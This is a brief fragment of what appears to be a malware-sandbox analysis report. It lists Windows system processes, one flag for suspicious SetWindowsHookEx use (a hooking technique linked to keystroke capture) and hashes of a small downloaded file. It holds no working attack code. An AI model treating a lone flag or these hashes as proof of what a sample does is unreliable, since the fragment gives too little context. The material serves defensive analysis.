C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:2000
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3284
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3140
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82